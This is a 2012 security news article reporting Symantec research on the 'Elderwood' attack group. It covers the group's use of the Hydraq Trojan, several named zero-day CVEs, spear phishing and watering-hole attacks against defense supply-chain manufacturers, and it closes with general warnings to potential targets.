Trojan Attacks Focus on Zero Days

Monday, September 10, 2012 @ 04:09 PM gHale

In three years, there have been quite a few high profile attacks by a group using the Hydraq Trojan. That Trojan, coupled with the use of Zero Day vulnerabilities has brought problems to some companies.

These attackers are systematic and re-use components of an infrastructure called the “Elderwood Platform,” according to research on the Symantec Security Response Blog.

Pushdo Trojan a Master of Disguise
Warning: Google Alert Contains Trojan
Cross-Platform Trojan Steals Passwords
Crisis Malware Goes Virtual

The term “Elderwood” comes from the exploit communication used in some of the attacks. This attack platform enables them to quickly deploy Zero Day exploits. The attacking methodology always used spear phishing emails but we are now seeing an increased adoption of “watering hole” attacks (compromising certain websites likely visited by the target victim).

In the over view, serious Zero Day vulnerabilities, exploited in the wild and affect a widely used piece of software, are relatively rare; there were approximately eight in 2011. The past few months however has seen four such Zero Day vulnerabilities used by the Elderwood attackers.

Although there are other attackers utilizing Zero Day exploits (for example, the Sykipot, Nitro, or even Stuxnet attacks), we have seen no other group use so many. The number of Zero Day exploits used indicates access to a high level of technical capability.

Here are just some of the most recent exploits that they have used:
• Adobe Flash Player Object Type Confusion Remote Code Execution Vulnerability CVE-2012-0779)
• Microsoft Internet Explorer Same ID Property Remote Code Execution Vulnerability (CVE-2012-1875)
• Microsoft XML Core Services Remote Code Execution Vulnerability (CVE-2012-1889)
• Adobe Flash Player Remote Code Execution Vulnerability (CVE-2012-1535)

In order to discover these vulnerabilities, the attackers would have to thoroughly reverse-engineer the compiled applications. This effort would substantially come down if they had access to source code. The group seemingly has an unlimited supply of Zero Day vulnerabilities. They seem to use these vulnerabilities as needed, often within close succession of each other if exposure of the currently used vulnerability is imminent.

The primary targets identified are within the defense supply chain, a majority of which are not top-tier defense organizations themselves. These are companies who manufacture electronic or mechanical components sold to top-tier defense companies. The attackers feel there is a weaker security posture in these lower tier organizations and may use these manufacturers as a stepping-stone to gain access to top-tier defense contractors, or obtain intellectual property used in the production of parts that make up larger products produced by a top-tier defense company.

One of the vectors of infection for which there is a substantial increase is the “watering hole” attack. That is a clear shift in the attacking group’s method of operations. The concept of the attack is similar to a predator waiting at a watering hole in a desert. The predator knows that victims will eventually have to come to the watering hole, so rather than go hunting, he waits for his victims to come to him.

Similarly, attackers find a Web site that caters to a particular audience, which includes the target the attackers have interest in. Having identified this website, the attackers hack into it using a variety of means.

The attackers then inject an exploit onto public pages of the website they hope their ultimate target will visit. Any visitor susceptible to the exploit ends up compromised and a back door Trojan is now on their computer. Three Zero Day exploits, CVE-2012-0779, CVE-2012- 1875, and CVE-2012-1889 have all serve up back door Trojans from compromised websites over a 30-day period. The increase in the use of this attack technique requires attackers to sift through a much greater amount of stolen information than a targeted attack relying on email, as the number of victims compromised by a Web injection attack will be much greater.

Any manufacturers who are in the defense supply chain need to be wary of attacks emanating from subsidiaries, business partners, and associated companies, as they may have undergone compromise and used as a stepping-stone to the true intended target.

Companies and individuals should prepare themselves for a new round of attacks in 2013. This is particularly the case for companies compromised in the past and managed to evict the attackers. The knowledge the attackers gained in their previous compromise will assist them in any future attacks.

Leave a Reply

You must be logged in to post a comment.